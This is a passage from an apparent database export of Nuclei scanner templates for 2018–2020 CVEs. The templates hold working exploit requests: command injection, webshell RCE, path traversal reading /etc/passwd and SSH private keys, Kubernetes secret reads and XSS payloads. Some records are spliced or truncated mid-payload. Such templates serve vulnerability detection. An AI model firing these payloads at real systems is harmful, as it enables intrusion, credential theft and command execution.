CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17431\n cwe-id: CWE-287\n epss-score: 0.11416\n epss-percentile: 0.95098\n cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: comodo\n product: unified_threat_management_firewall\n tags: cve,cve2018,comodo,rce,edb\n\nhttp:\n - raw:\n - |\n GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n - | # to triggering RCE\n GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Configuration has been altered\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ca7ed1082cfdba5563bdbd1b3dc533dd565615fe6a085a30befb5e2f75e5442d022100bd883a1061bf5478d99af8d1b40df6015f8b5b38d7fa411037031d3c1bef9bc3:922c64590222798bb761d5b6d8e72950", "hash": "a5d93d71c3335c367d0e218dd1eaef4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806a" }, "name": "CVE-2018-18069.yaml", "content": "id: CVE-2018-18069\n\ninfo:\n name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting\n author: nadino\n severity: medium\n description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability.\n reference:\n - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18069\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-18069\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38026\n cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpml\n product: wpml\n framework: wordpress\n tags: cve2018,cve,wordpress,xss,plugin,wpml\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin.php\"\n\n body: |\n icl_post_action=save_theme_localization&locale_file_name_en=EN\">\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'contains(tolower(header), \"text/html\")'\n - 'contains(set_cookie, \"_icl_current_admin_language\")'\n - 'contains(body, \"\\\">\")'\n condition: and\n# digest: 4b0a00483046022100cbde343fd3e17d2ea27e336ffb9188c1b206ffddbca64133f60a51899fec8161022100f831ce4023cacc6cdc0e47b7d783b39f80685ce3a9dd5b1f475af144b8163794:922c64590222798bb761d5b6d8e72950", "hash": "d28e802286666f380cf00277dfeb3220", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806b" }, "name": "CVE-2018-18264.yaml", "content": "id: CVE-2018-18264\n\ninfo:\n name: Kubernetes Dashboard <1.10.1 - Authentication Bypass\n author: edoardottt\n severity: high\n description: |\n Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster.\n remediation: |\n Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability.\n reference:\n - https://github.com/kubernetes/dashboard/pull/3289\n - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/\n - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18264\n - https://github.com/kubernetes/dashboard/pull/3400\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-18264\n cwe-id: CWE-306\n epss-score: 0.96092\n epss-percentile: 0.99459\n cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kubernetes\n product: dashboard\n shodan-query: product:\"Kubernetes\"\n tags: cve,cve2018,kubernetes,k8s,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs\"\n - \"{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body, \"apiVersion\") && contains(body, \"objectRef\")'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950", "hash": "5ec58b4e2d331cd7d377b1b47062310e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806c" }, "name": "CVE-2018-18323.yaml", "content": "id: CVE-2018-18323\n\ninfo:\n name: Centos Web Panel 0.9.8.480 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Centos Web Panel.\n reference:\n - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html\n - http://centos-webpanel.com/\n - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18323\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-18323\n cwe-id: CWE-22\n epss-score: 0.9648\n epss-percentile: 0.99556\n cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: control-webpanel\n product: webpanel\n tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950", "hash": "6cf48406e3dfbb2f5a61d04c5b5f8204", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806d" }, "name": "CVE-2018-18570.yaml", "content": "id: CVE-2018-18570\n\ninfo:\n name: Planon \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950", "hash": "037e44071fd64bf8ab8af592afa276be", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806e" }, "name": "CVE-2018-18608.yaml", "content": "id: CVE-2018-18608\n\ninfo:\n name: DedeCMS 5.7 SP2 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - https://github.com/ky-j/dedecms/issues/8\n - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18608\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-18608\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.54991\n cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dedecms\n product: dedecms\n shodan-query: http.html:\"DedeCms\"\n tags: cve2018,cve,dedecms,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plus/feedback.php/rp4hu%27>\")'\n# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950", "hash": "7ddcc242f21feab814086b834cf76e0f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308074" }, "name": "CVE-2018-19136.yaml", "content": "id: CVE-2018-19136\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45883/\n - https://github.com/domainmod/domainmod/issues/79\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19136\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19136\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50531\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: cve2018,cve,edb,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">&really_del=1\">YES'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202aa2d37d93090e65caa5149dce628a5f34aaf844a03795a60118487af86ad41a022100948b4dfb7fbc394901fe1405320714bc046f960c82c84e7dd65bfd91b4001a31:922c64590222798bb761d5b6d8e72950", "hash": "67c51c8950a4baf57fbbbadcefb3c44b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308075" }, "name": "CVE-2018-19137.yaml", "content": "id: CVE-2018-19137\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://github.com/domainmod/domainmod/issues/79\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19137\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19137\n cwe-id: CWE-79\n epss-score: 0.00096\n epss-percentile: 0.39294\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: cve,cve2018,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '&really_del'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950", "hash": "70b0f545940507a4291c82e869aca9f8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308076" }, "name": "CVE-2018-19287.yaml", "content": "id: CVE-2018-19287\n\ninfo:\n name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7\n - https://wordpress.org/plugins/ninja-forms/\n - https://www.exploit-db.com/exploits/45880\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19287\n - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19287\n cwe-id: CWE-79\n epss-score: 0.37007\n epss-percentile: 0.96816\n cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ninjaforma\n product: ninja_forms\n framework: wordpress\n tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\">'\n\n - type: word\n part: header_2\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950", "hash": "4980b87aedf196aeb4ad112d8ca1967d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308077" }, "name": "CVE-2018-19326.yaml", "content": "id: CVE-2018-19326\n\ninfo:\n name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing \"dot dot\" sequences (/../), conduct directory traversal attacks, and view arbitrary files.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system.\n remediation: |\n Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45904\n - https://www.cybersecurity-help.cz/vdb/SB2018120309\n - https://www.zyxel.com/homepage.shtml\n - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19326\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-19326\n cwe-id: CWE-22\n epss-score: 0.01158\n epss-percentile: 0.83304\n cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zyxel\n product: vmg1312-b10d_firmware\n shodan-query: http.html:\"VMG1312-B10D\"\n tags: cve2018,cve,lfi,modem,router,edb,zyxel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950", "hash": "860ce95edea26acb1552bfa104ab008d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308078" }, "name": "CVE-2018-19365.yaml", "content": "id: CVE-2018-19365\n\ninfo:\n name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.\n reference:\n - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19365\n - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2018-19365\n cwe-id: CWE-22\n epss-score: 0.01354\n epss-percentile: 0.8589\n cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wowza\n product: streaming_engine\n tags: cve2018,cve,wowza,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950", "hash": "3a22920dcde785620fcb43e018d3c199", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308079" }, "name": "CVE-2018-19386.yaml", "content": "id: CVE-2018-19386\n\ninfo:\n name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.\n reference:\n - https://i.imgur.com/Y7t2AD6.png\n - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19386\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19386\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.53963\n cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solarwinds\n product: database_performance_analyzer\n tags: cve,cve2018,solarwinds,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\n ]>\n \n John\n &ent;\n \n\n headers:\n Content-Type: \"text/xml\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022016df2511df9587d2e1a21d59a71e3598c4f666acb51d03d55d3877ee6e3976040220787814d8c0cecd08ab442e0a8d29b441bac92c91492a482328322906b431ac95:922c64590222798bb761d5b6d8e72950", "hash": "4e0861e3c723e1e0b8203ec8ab10a405", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308174" }, "name": "CVE-2020-12054.yaml", "content": "id: CVE-2020-12054\n\ninfo:\n name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4\n - https://wpvulndb.com/vulnerabilities/10184\n - https://cxsecurity.com/issue/WLB-2020040144\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12054\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-12054\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.47553\n cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: catchplugins\n product: catch_breadcrumb\n framework: wordpress\n tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"catch-breadcrumb\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100db708e082a8ba3d59091821632d7f2241b495b3932aebc1de6d324cc76bdbcd9022100984ecb6f768fc8d248166e2f3916daa1a37999edc2146bbb3ba81da8931397cb:922c64590222798bb761d5b6d8e72950", "hash": "9d5800cadc14e2882569fde3fb2661a1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308175" }, "name": "CVE-2020-12116.yaml", "content": "id: CVE-2020-12116\n\ninfo:\n name: Zoho ManageEngine OpManger - Arbitrary File Read\n author: dwisiswant0\n severity: high\n description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.\n reference:\n - https://github.com/BeetleChunks/CVE-2020-12116\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12116\n - https://www.manageengine.com/network-monitoring/help/read-me-complete.html\n - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12116\n cwe-id: CWE-22\n epss-score: 0.97317\n epss-percentile: 0.99861\n cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zohocorp\n product: manageengine_opmanager\n tags: cve,cve2020,zoho,lfi,manageengine,zohocorp\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Connection: close\n - |\n GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Cache-Control: max-age=0\n Connection: close\n Referer: http://{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"BEGIN RSA PRIVATE KEY\")'\n - 'status_code_2 == 200'\n condition: and\n\n extractors:\n - type: regex\n name: endpoint\n regex:\n - \"(?m)/cachestart/.*/jquery/\"\n internal: true\n part: body\n# digest: 490a0046304402200fc5ad9bdb1cc7520cf23bdb7395e0d52813c4184fa6a1b953bf69abf71b04a602207241ce6f30a6867e7c54ad6c3c2b7f7d2baf83ec792ce0c9e0b0a1ae5bd4243e:922c64590222798bb761d5b6d8e72950", "hash": "0f4aa34438616f527248f213d71eac90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308176" }, "name": "CVE-2020-12124.yaml", "content": "id: CVE-2020-12124\n\ninfo:\n name: WAVLINK WN530H4 live_api.cgi - Command Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.\n reference:\n - https://github.com/db44k/CVE-2020-12124\n - https://cerne.xyz/bugs/CVE-2020-12124\n - https://www.wavlink.com/en_us/product/WL-WN530H4.html\n - https://github.com/Scorpion-Security-Labs/CVE-2020-12124\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12124\n cwe-id: CWE-78\n epss-score: 0.9601\n epss-percentile: 0.99361\n cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wavlink\n product: wn530h4_firmware\n tags: cve,cve2020,rce,wavlink\nvariables:\n str: \"{{rand_base(3)}}\"\n num: \"{{rand_int(1, 10)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: word\n part: body\n words:\n - \"WiFiBand\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022013b21c005e3c657c433da224d005da53b149eeb80dfd4a028acd677b578ee5b6022054d78001a87409fc8d1a6988d3013a2efcf687ac9dd00c898b55d79cecbe548e:922c64590222798bb761d5b6d8e72950", "hash": "0f9b7c75566c81833dd5f984fddc69c9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 